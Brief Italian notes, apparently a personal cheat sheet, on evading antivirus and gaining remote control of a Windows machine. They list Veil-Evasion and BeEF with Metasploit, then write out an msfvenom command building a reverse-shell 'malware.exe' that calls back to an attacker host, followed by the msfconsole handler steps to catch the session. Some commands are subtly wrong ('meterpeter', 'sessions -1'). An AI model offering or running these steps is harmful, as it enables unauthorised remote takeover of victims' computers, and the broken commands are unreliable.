baypassare antivirus

utilizzare Veil-evasion

beef + metasploit

se nella stessa rete, link video

usando msfvenom e meterpeter

  • create reverse shell:
    • msfvenom -p windows/x64/meterpeter/reverse_tcp LHOST=IP_RICEVENTE LPORT=_PORTA_RICEVENTE -f exe > malware.exe
    • questo file viene eseguito su windows; assicurarsi che antivirus disattivato
  • Su PC in ascolto:
    • msfconsole
    • use exploit/multi/handler
    • set payload windows/x64/meterpeter/reverse_tcp
    • set lhost IP_RICEVENTE
    • set LPORT PORTA_RICEVENTE
    • set exitonsession false
    • exploit -j lancia il listener in background
    • Lanciare il file exe su win
    • sessions -1 PID_SESSIONE per entrare nella shell meterpeter